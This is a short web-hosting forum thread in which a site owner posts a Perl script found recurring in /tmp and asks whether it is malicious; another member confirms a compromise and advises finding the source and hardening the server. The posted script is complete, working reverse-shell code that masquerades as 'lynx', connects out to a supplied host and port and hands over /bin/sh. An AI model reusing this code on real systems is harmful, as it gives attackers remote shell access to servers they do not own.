SuperBaby

Well-Known Member
Nov 27, 2003
338
0
166
Thailand
cPanel Access Level
Website Owner
Twitter
I found this script called "back" in the /tmp folder. I deleted it and it came back again after a day. Is it a malicious script?

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
 

NightStorm

Well-Known Member
Jul 28, 2003
286
4
168
cPanel Access Level
Root Administrator
Twitter
In a word, yes. It's a compromise, though not necessarily a root one. You'll need to track down the source of the file, and patch the problem, as well as go over your server's security with a fine-tooth comb and make sure that nothing else bad gets dropped into /tmp